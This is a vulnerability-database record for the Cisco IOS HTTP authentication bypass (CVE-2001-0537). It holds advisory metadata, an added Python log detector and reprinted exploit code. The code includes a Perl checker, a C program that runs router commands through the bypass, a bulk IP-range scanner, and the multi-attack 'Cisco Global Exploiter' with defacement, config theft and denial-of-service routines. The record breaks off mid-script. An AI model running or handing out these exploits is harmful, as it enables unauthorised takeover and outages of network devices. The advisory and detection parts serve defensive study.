CVE-2001-0537
CVSS 9.3
Published: 2001-07-21 00:00:00
Revised: 2008-09-05 00:00:00
NMCOE

[Original] HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.


[CNNVD] Cisco IOS web configuration interface authentication bypass vulnerability (CNNVD-200107-164)

        IOS is router firmware developed by Cisco. IOS runs on many Cisco devices (including routers and switches).
        Versions of Cisco IOS from 11.3 onward have a security issue: if the web management interface is enabled, any remote attacker can obtain full administrative privileges on the device.
        An attacker only needs to construct a URL of the following form:
        http:///level/xx/exec/....
        Here xx is an integer between 16 and 99. The value may differ from device to device, but an attacker needs at most 84 attempts to find the right one.
        This issue may let a remote user obtain full administrative privileges and go on to penetrate the network further; it may also result in denial of service.
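The URL pattern above is the whole signature of this bug, so it is also what a defender should look for in HTTP traffic reaching the device. The following Python is an added example, not code from this record or from the advisories and exploits it links: it parses access-log-style request lines captured in front of the IOS HTTP server (the line format and the sample lines are constructed for this example), flags any request to /level/NN/exec/ with NN in the 16..99 range named in the description, records whether the device answered 200 (the exploit condition) or 401, and groups hits per source so a walk through many levels, as the published scanners do, stands out from a single stray request. Percent-encoded and mixed-case paths are normalised first so an encoded form of the same URL is not missed.

```python
"""Detect privilege-level probes against the Cisco IOS HTTP server.

Added example for CVE-2001-0537; the log format is constructed and the
threshold is an assumption, adapt both to the log source in front of the
device.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# /level/<NN>/exec at the start of the path, case-insensitive.
LEVEL_EXEC = re.compile(r"^/level/(\d{1,3})/exec(?:/|$)", re.IGNORECASE)

# Common-log-style line: client, ident, user, [timestamp], "request", status.
# Constructed format for this example.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(path):
    # Drop the query string, decode percent-encoding (e.g. %36%35 -> 65)
    # and collapse repeated slashes before matching.
    path = unquote(path.split("?", 1)[0])
    return re.sub(r"/+", "/", path)


def classify_request(path, status):
    """Return (level, outcome) for a level/exec probe, else None.

    outcome is 'success' when the device answered 200 (the bypass
    condition), 'rejected' on 401, otherwise 'other'. Only the 16..99
    range from the advisory is treated as a probe; level 15 and below
    are ordinary authenticated use of the interface.
    """
    m = LEVEL_EXEC.match(normalize_path(path))
    if not m:
        return None
    level = int(m.group(1))
    if not 16 <= level <= 99:
        return None
    outcome = {200: "success", 401: "rejected"}.get(int(status), "other")
    return level, outcome


def analyze_log(lines, sweep_threshold=5):
    """Parse log lines and summarise probes per source address.

    result[src] = {"levels": sorted levels probed,
                   "success": levels that returned 200,
                   "sweep": True when >= sweep_threshold distinct levels
                            were tried (brute-forcing the level)}
    """
    findings = defaultdict(lambda: {"levels": set(), "success": []})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand
        hit = classify_request(m.group("path"), m.group("status"))
        if hit is None:
            continue
        level, outcome = hit
        entry = findings[m.group("src")]
        entry["levels"].add(level)
        if outcome == "success":
            entry["success"].append(level)
    return {
        src: {
            "levels": sorted(e["levels"]),
            "success": e["success"],
            "sweep": len(e["levels"]) >= sweep_threshold,
        }
        for src, e in findings.items()
    }


# Constructed sample lines (not real traffic): one source walks levels
# 16..20 until a 200, another sends a level-15 request and an encoded
# level 65, a third is ordinary traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jul/2001:11:22:07 +0000] "GET /level/16/exec/- HTTP/1.0" 401',
    '192.0.2.10 - - [02/Jul/2001:11:22:08 +0000] "GET /level/17/exec/- HTTP/1.0" 401',
    '192.0.2.10 - - [02/Jul/2001:11:22:09 +0000] "GET /level/18/exec/- HTTP/1.0" 401',
    '192.0.2.10 - - [02/Jul/2001:11:22:10 +0000] "GET /level/19/exec/- HTTP/1.0" 401',
    '192.0.2.10 - - [02/Jul/2001:11:22:11 +0000] "GET /level/20/exec/show%20conf HTTP/1.0" 200',
    '198.51.100.7 - - [02/Jul/2001:11:30:00 +0000] "GET /LEVEL/15/exec/- HTTP/1.0" 401',
    '198.51.100.7 - - [02/Jul/2001:11:30:01 +0000] "GET /level/%36%35/exec/- HTTP/1.0" 401',
    '203.0.113.4 - - [02/Jul/2001:11:31:00 +0000] "GET /index.html HTTP/1.0" 200',
]

if __name__ == "__main__":
    for src, summary in analyze_log(SAMPLE_LOG).items():
        print(src, summary)
```

A single rejected probe is worth a low-priority alert; a sweep from one source, or any probe that the device answered with 200, should be treated as a compromise of the device and handled as the advisory section below describes (disable the HTTP server or move authentication off local authorization, then upgrade).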
        

- CVSS (base score)

CVSS score: 9.3 [severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: MEDIUM [exploitation requires certain access conditions]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CWE (weakness category)

CWE-287 [Improper Authentication]

- CPE (affected platforms and products)

cpe:/o:cisco:ios:12.0%2810%29w5%2818g%29  Cisco IOS 12.0 (10)W5(18g)
cpe:/o:cisco:ios:12.1xr  Cisco IOS 12.1XR
cpe:/o:cisco:ios:11.3t  Cisco IOS 11.3T
cpe:/o:cisco:ios:12.0xi  Cisco IOS 12.0XI
cpe:/o:cisco:ios:12.1xv  Cisco IOS 12.1XV
cpe:/o:cisco:ios:12.0sc  Cisco IOS 12.0SC
cpe:/o:cisco:ios:12.0s  Cisco IOS 12.0S
cpe:/o:cisco:ios:12.0  Cisco IOS 12.0
cpe:/o:cisco:ios:12.2xe  Cisco IOS 12.2XE
cpe:/o:cisco:ios:12.1xw  Cisco IOS 12.1XW
cpe:/o:cisco:ios:12.0xr  Cisco IOS 12.0XR
cpe:/o:cisco:ios:12.2xd  Cisco IOS 12.2XD
cpe:/o:cisco:ios:12.1t  Cisco IOS 12.1T
cpe:/o:cisco:ios:12.1ez  Cisco IOS 12.1EZ
cpe:/o:cisco:ios:12.2xh  Cisco IOS 12.2XH
cpe:/o:cisco:ios:12.1xf  Cisco IOS 12.1XF
cpe:/o:cisco:ios:12.2xq  Cisco IOS 12.2XQ
cpe:/o:cisco:ios:12.1xx  Cisco IOS 12.1XX
cpe:/o:cisco:ios:12.1xb  Cisco IOS 12.1XB
cpe:/o:cisco:ios:12.1xg  Cisco IOS 12.1XG
cpe:/o:cisco:ios:12.0xp  Cisco IOS 12.0XP
cpe:/o:cisco:ios:12.1xl  Cisco IOS 12.1XL
cpe:/o:cisco:ios:12.1xc  Cisco IOS 12.1XC
cpe:/o:cisco:ios:12.0xg  Cisco IOS 12.0XG
cpe:/o:cisco:ios:12.0wt  Cisco IOS 12.0WT
cpe:/o:cisco:ios:12.2  Cisco IOS 12.2
cpe:/o:cisco:ios:12.1xt  Cisco IOS 12.1XT
cpe:/o:cisco:ios:12.0%2814%29w5%2820%29  Cisco IOS 12.0 (14)W5(20)
cpe:/o:cisco:ios:12.1yd  Cisco IOS 12.1YD
cpe:/o:cisco:ios:12.0sl  Cisco IOS 12.0SL
cpe:/o:cisco:ios:12.0xs  Cisco IOS 12.0XS
cpe:/o:cisco:ios:12.1xp  Cisco IOS 12.1XP
cpe:/o:cisco:ios:12.0%287%29xk  Cisco IOS 12.0 (7)XK
cpe:/o:cisco:ios:12.1xs  Cisco IOS 12.1XS
cpe:/o:cisco:ios:11.3db  Cisco IOS 11.3DB
cpe:/o:cisco:ios:12.1xj  Cisco IOS 12.1XJ
cpe:/o:cisco:ios:12.1xz  Cisco IOS 12.1XZ
cpe:/o:cisco:ios:12.0xm  Cisco IOS 12.0XM
cpe:/o:cisco:ios:12.0db  Cisco IOS 12.0DB
cpe:/o:cisco:ios:12.1xu  Cisco IOS 12.1XU
cpe:/o:cisco:ios:12.1xi  Cisco IOS 12.1XI
cpe:/o:cisco:ios:11.3xa  Cisco IOS 11.3 XA
cpe:/o:cisco:ios:12.0st  Cisco IOS 12.0ST
cpe:/o:cisco:ios:12.0xj  Cisco IOS 12.0XJ
cpe:/o:cisco:ios:12.1ya  Cisco IOS 12.1YA
cpe:/o:cisco:ios:11.3  Cisco IOS 11.3
cpe:/o:cisco:ios:12.1yc  Cisco IOS 12.1YC
cpe:/o:cisco:ios:11.3na  Cisco IOS 11.3 NA
cpe:/o:cisco:ios:12.0xl  Cisco IOS 12.0XL
cpe:/o:cisco:ios:12.1xe  Cisco IOS 12.1XE
cpe:/o:cisco:ios:12.0xu  Cisco IOS 12.0XU
cpe:/o:cisco:ios:12.1xd  Cisco IOS 12.1XD
cpe:/o:cisco:ios:11.3ma  Cisco IOS 11.3 MA
cpe:/o:cisco:ios:11.3ha  Cisco IOS 11.3 HA
cpe:/o:cisco:ios:12.1cx  Cisco IOS 12.1CX
cpe:/o:cisco:ios:12.1da  Cisco IOS 12.1DA
cpe:/o:cisco:ios:12.1ey  Cisco IOS 12.1EY
cpe:/o:cisco:ios:12.0%285%29xk  Cisco IOS 12.0 (5)XK
cpe:/o:cisco:ios:12.1xa  Cisco IOS 12.1XA
cpe:/o:cisco:ios:12.0dc  Cisco IOS 12.0DC
cpe:/o:cisco:ios:12.1  Cisco IOS 12.1
cpe:/o:cisco:ios:12.1aa  Cisco IOS 12.1AA
cpe:/o:cisco:ios:12.0xb  Cisco IOS 12.0XB
cpe:/o:cisco:ios:12.1db  Cisco IOS 12.1DB
cpe:/o:cisco:ios:12.0xe  Cisco IOS 12.0XE
cpe:/o:cisco:ios:12.0xq  Cisco IOS 12.0XQ
cpe:/o:cisco:ios:12.1yf  Cisco IOS 12.1YF
cpe:/o:cisco:ios:12.0xd  Cisco IOS 12.0XD
cpe:/o:cisco:ios:12.1xk  Cisco IOS 12.1XK
cpe:/o:cisco:ios:12.2xa  Cisco IOS 12.2XA
cpe:/o:cisco:ios:11.3aa  Cisco IOS 11.3AA
cpe:/o:cisco:ios:12.0wc  Cisco IOS 12.0WC
cpe:/o:cisco:ios:12.1ec  Cisco IOS 12.1EC
cpe:/o:cisco:ios:11.3da  Cisco IOS 11.3 DA
cpe:/o:cisco:ios:12.0xa  Cisco IOS 12.0XA
cpe:/o:cisco:ios:12.1e  Cisco IOS 12.1E
cpe:/o:cisco:ios:12.0da  Cisco IOS 12.0DA
cpe:/o:cisco:ios:12.1ex  Cisco IOS 12.1EX
cpe:/o:cisco:ios:12.0xh  Cisco IOS 12.0XH
cpe:/o:cisco:ios:12.1xq  Cisco IOS 12.1XQ
cpe:/o:cisco:ios:12.0xv  Cisco IOS 12.0XV
cpe:/o:cisco:ios:12.0xf  Cisco IOS 12.0XF
cpe:/o:cisco:ios:12.0xc  Cisco IOS 12.0XC
cpe:/o:cisco:ios:12.1xh  Cisco IOS 12.1XH
cpe:/o:cisco:ios:12.1xy  Cisco IOS 12.1XY
cpe:/o:cisco:ios:12.0t  Cisco IOS 12.0T
cpe:/o:cisco:ios:12.1dc  Cisco IOS 12.1DC
cpe:/o:cisco:ios:12.0xn  Cisco IOS 12.0XN
cpe:/o:cisco:ios:12.2t  Cisco IOS 12.2T
cpe:/o:cisco:ios:12.1yb  Cisco IOS 12.1YB
cpe:/o:cisco:ios:12.1xm  Cisco IOS 12.1XM

- OVAL (technical details for detection)

oval:org.mitre.oval:def:5663  Cisco IOS HTTP Authorization Circumvention Vulnerability
* OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0537
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0537
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-164
(official data source) CNNVD

- Other links and resources

http://www.cert.org/advisories/CA-2001-14.html
(VENDOR_ADVISORY)  CERT  CA-2001-14
http://www.securityfocus.com/bid/2936
(VENDOR_ADVISORY)  BID  2936
http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
(VENDOR_ADVISORY)  CISCO  20010627 IOS HTTP authorization vulnerability
http://xforce.iss.net/static/6749.php
(UNKNOWN)  XF  cisco-ios-admin-access(6749)
http://www.securityfocus.com/archive/1/Pine.LNX.3.96.1010702134611.22995B-100000@Lib-Vai.lib.asu.edu
(UNKNOWN)  BUGTRAQ  20010702 Cisco device HTTP exploit...
http://www.securityfocus.com/archive/1/4.3.2.7.2.20010629095801.0c3e6a70@brussels.cisco.com
(UNKNOWN)  BUGTRAQ  20010629 Re: Cisco Security Advisory: IOS HTTP authorization vulnerability
http://www.securityfocus.com/archive/1/20010703011650.60515.qmail@web14910.mail.yahoo.com
(UNKNOWN)  BUGTRAQ  20010702 ios-http-auth.sh
http://www.securityfocus.com/archive/1/1601227034.20010702112207@olympos.org
(UNKNOWN)  BUGTRAQ  20010702 Cisco IOS HTTP Configuration Exploit
http://www.osvdb.org/578
(UNKNOWN)  OSVDB  578
http://www.ciac.org/ciac/bulletins/l-106.shtml
(UNKNOWN)  CIAC  L-106

- Vulnerability information

Cisco IOS web configuration interface authentication bypass vulnerability
High risk  Unknown
2001-07-21 00:00:00 2005-05-02 00:00:00
Remote
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Temporarily disable the web management function on affected devices.
        Vendor patch:
        Cisco
        -----
        Cisco has released a security advisory (CI-01.08) and corresponding patches for this issue:
        CI-01.08: IOS HTTP authorization vulnerability
        Link:
        The full advisory is available at the address below; choose the patch or upgrade version that matches your Cisco device model:
        
        http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html

- Vulnerability information (20975)

Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (1) (EDBID:20975)
hardware remote
2001-06-27 Verified
0 cronos
N/A
source: http://www.securityfocus.com/bid/2936/info

IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.

It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.

This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 

#!/usr/bin/perl
# modified roelof's uni.pl
# to check cisco ios http auth bug
# cronos <cronos@olympos.org>
use Socket;
print "enter IP (x.x.x.x): ";
$host= <STDIN>;
chop($host);
$i=16;
$port=80;
$target = inet_aton($host);
$flag=0;
LINE: while ($i<100) { 
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
foreach $line (@results){
        $line=~ tr/A-Z/a-z/;
        if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
        if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
} 
        if ($flag==1){print "Not Vulnerable with $i\n\r";}
                else {print "$line Vulnerable with $i\n\r"; last LINE; }
        $i++;
sub sendraw {
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
}

- Vulnerability information (20976)

Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (2) (EDBID:20976)
hardware remote
2001-06-27 Verified
0 Eliel C. Sardanons
N/A
source: http://www.securityfocus.com/bid/2936/info
 

/* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
 * to compile:
 * bash# gcc -o cisco cisco.c 
 */

#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* strlen(), strstr(), memset() */
#include <unistd.h>     /* read(), write() */
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define HTTP_PORT 80
#define PROMPT "\ncisco$ "

int usage (char *progname) {
        printf ("Usage:\n\t%s server\n", progname);
        exit(-1);
}                                                               
        
int main (int argc, char *argv[]) {
        struct hostent *he;
        struct sockaddr_in sin;
        int sck, i;
        char command[256], buffer[512];
        if (argc < 2)
                usage(argv[0]);
        if ((he = gethostbyname(argv[1])) == NULL) {
                perror("host()");
                exit(-1);
        }
        sin.sin_family = AF_INET;
        sin.sin_port = htons(HTTP_PORT);
        sin.sin_addr = *((struct in_addr *)he->h_addr);
        while (1) {
                if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
                        perror("socket()");
                        exit(-1);
                }
                if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
                        perror ("connect()");
                        exit(-1);
                }
                printf (PROMPT);
                fgets (command, 256, stdin);
                if (strlen(command) == 1) 
                        break;
                for (i=0;i<strlen(command);i++) {
                        if (command[i] == ' ')
                                command[i] = '/';
                }
                snprintf (buffer, sizeof(buffer), 
                                                        "GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command); 
                write (sck, buffer, strlen(buffer));
                memset (buffer, 0, sizeof(buffer));
                while ((read (sck, buffer, sizeof(buffer))) != 0) {
                        if ((strstr(buffer, "CR</A>")) != 0) {
                                printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
                                memset (buffer, 0, sizeof(buffer));
                                break;
                        } else if ((strstr(buffer, "Unauthorized")) != 0) {
                                printf ("Server not vulnerable\n");
                                exit(-1);
                        } else {
                                printf ("%s", buffer);
                                memset (buffer, 0, sizeof(buffer));
                        }
                 }
        }
        printf ("Thanks...\n");
        exit(0);
}

- Vulnerability information (20977)

Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (3) (EDBID:20977)
hardware remote
2001-03-07 Verified
0 hypoclear
N/A
source: http://www.securityfocus.com/bid/2936/info
  

#!/usr/bin/perl
#
# Bulk Scanner for the Cisco IOS HTTP Configuration Arbitrary
# Administrative Access Vulnerability
# Found: 06-27-01 - Bugtraq ID: 2936
# Written by hypoclear on 07-03-01
#
# usage: ./IOScan.pl <start ip> <end ip>
# Note: start and end ip must be a Class B or C network
# example: ./IOScan 192.168.0.0 192.168.255.255
#
# hypoclear - hypoclear@jungle.net - http://hypoclear.cjb.net
# This and all of my programs fall under my disclaimer, which
# can be found at: http://hypoclear.cjb.net/hypodisclaim.txt

use IO::Socket; 

die "\nusage: $0 <start ip> <end ip>
Note:  start and end ip must be a Class B or C network
ex:   ./IOScan 192.168.0.0 192.168.255.255\n\n" unless @ARGV > 0;
$num = 16; $ipcount = 0; $vuln = 0;

if (defined $ARGV[1])
 { $currentIP = $ARGV[0]; $endIP = $ARGV[1];
   while(1)
    { @CURIP = split(/\./,$currentIP);
      if (($CURIP[2] > 255) && ($CURIP[3] > 255))
       { scanEnd();
       }
      print "Scanning $currentIP\n";
      scan($currentIP);
      if ($currentIP eq $endIP)
       { scanEnd();
       }
      if ($CURIP[3] < 255)
       { $CURIP[3]++;
       }
      else
       { $CURIP[2]++;
         $CURIP[3]=0;
       }
      $currentIP = "";
      foreach $item (@CURIP)
        { $currentIP .= "$item.";
        }
      $currentIP =~ s/\.$//;
      $ipcount++;
     }
 }


sub scan
  { while ($num <100)
      { $IP = $_[0];
        sender("GET /level/$num/exec/- HTTP/1.0\n\n");
        if ($webRecv =~ /200 ok/)
         { $vuln++;
           open(OUT,">>ios.out") || die "Can't write to file";
           print OUT "$IP is Vulnerable\n";
           close(OUT);
           $num = 101;
         }
        $num++;
      }
     $num = 16;
  }


sub sender
  { $sendsock = IO::Socket::INET -> new(Proto     => 'tcp',
                                        PeerAddr  => $IP,
                                        PeerPort  => 80,
                                        Type      => SOCK_STREAM,
                                        Timeout   => 1);
        unless($sendsock){die "Can't connect to $ARGV[0]"}
   $sendsock->autoflush(1);

   $sendsock -> send($_[0]);
   $webRecv = ""; while(<$sendsock>){$webRecv .= $_} $webRecv =~ s/\n//g;
   close $sendsock;
  }


sub scanEnd
  { print "\nScanned $ipcount ip addresses, $vuln addresses found vulnerable.\n";
    if ($vuln > 0) {print "Check ios.out for vulnerable addresses.";}
    die "\n";
  }

- Vulnerability information (20978)

Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (4) (EDBID:20978)
hardware remote
2001-06-27 Verified
0 blackangels
N/A
source: http://www.securityfocus.com/bid/2936/info
   

#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##



##
# Modules
##

use Socket;
use IO::Socket;


##
# Main
##

$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##
# Functions
##

sub usage
{
  printf "\nUsage :\n";
  printf "perl cge.pl <target> <vulnerability number>\n\n";
  printf "Vulnerabilities list :\n";
  printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
  printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
  printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
  printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
  printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
  printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
  printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
  printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
  printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
  printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
  printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n";
  printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n";
  printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n";
  printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n";
  exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $dch = "?????????????????a~ %%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $dch x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     ) || die("No telnet server detected on $serv ...\n\n");

  $sockd->autoflush(1);
  print $sockd "$string". $shc;
  while (<$sockd>){ print }
  print("\nPacket sent ...\n");
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto => "tcp",
                                      PeerAddr => $serv,
                                      PeerPort => "(23)",
                                      ) || die("Vulnerability successful exploited. Target server is down ...\n\n");

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
  my $serv = $host;

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};
  $sockd->autoflush(1);
  print $sockd "GET /\%\% HTTP/1.0\n\n";
  -close $sockd;
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
  my $serv= $host;
  my $n=16;
  my $port=80;
  my $target = inet_aton($serv);
  my $fg = 0;

  LAB: while ($n<100) {
  my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
  $n++;
  foreach $line (@results){
          $line=~ tr/A-Z/a-z/;
          if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
          if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
  }

  if ($fg==1) {
               sleep(2);
               print "Vulnerability unsuccessful exploited ...\n\n";
              }
  else {
        sleep(2);
        print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";
        last LAB;
       }

  sub exploit {
               my ($pstr)=@_;
               socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
               die("Unable to initialize socket ...\n\n");
               if(connect(S,pack "SnA4x8",2,$port,$target)){
                                                            my @in;
                                                            select(S);
                                                            $|=1;
                                                            print $pstr;
                                                            while(<S>){ push @in, $_;}
                                                            select(STDOUT); close(S); return @in;
                                                           }
  else { die("No http server detected on $serv ...\n\n"); }
  }
  }
  exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
  my $serv = $host;
  my $n = 16;

  while ($n <100) {
                   exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
                   $wr =~ s/\n//g;
                   if ($wr =~ /200 ok/) {
                                              while(1)
                                              { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
                                                print "[1] Banner change\n";
                                                print "[2] List vty 0 4 acl info\n";
                                                print "[3] Other\n";
                                                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                                                $vuln = <STDIN>;
                                                chomp($vuln);

                   if ($vuln == 1) {
                                    print "\nEnter deface line : ";
                                    $vuln = <STDIN>;
                                    chomp($vuln);
                                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
                                   }
                   elsif ($vuln == 2) {
                                       exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
                                       print "$wrf";
                                      }
                   elsif ($vuln == 3)
                                      { print "\nEnter attack URL : ";
                                        $vuln = <STDIN>;
                                        chomp($vuln);
                                        exploit1("GET /$vuln HTTP/1.0\n\n");
                                        print "$wrf";
                                      }
         }
         }
         $wr = "";
         $n++;
  }
  die "Vulnerability unsuccessful exploited ...\n\n";

  sub exploit1 {
                my $sockd = IO::Socket::INET -> new (
                                                     Proto => 'tcp',
                                                     PeerAddr => $serv,
                                                     PeerPort => 80,
                                                     Type => SOCK_STREAM,
                                                     Timeout => 5);
                                                     unless($sockd){die "No http server detected on $serv ...\n\n"}
  $sockd->autoflush(1);
  $sockd -> send($_[0]);
  while(<$sockd>){$wr .= $_} $wrf = $wr;
  close $sockd;
  }
  exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 22;
  my $vuln = "a%a%a%a%a%a%a%";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No ssh server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET ? HTTP/1.0\n\n";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  close($sockd);
  exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $k = "";
  
  print "Enter a file to read [ /show/config/cr set as default ] : ";
  $k = <STDIN>;
  chomp ($k);
  if ($k eq "")
  {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
  else
  {$vuln = "GET /exec$k HTTP/1.0\n\n";}

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET /error?/ HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
  my $ip = $host;
  my $port = "514";
  my $ports = "";
  my $size = "";
  my $i = "";
  my $string = "%%%%%XX%%%%%";

  print "Input packets size : ";
  $size = <STDIN>;
  chomp($size);
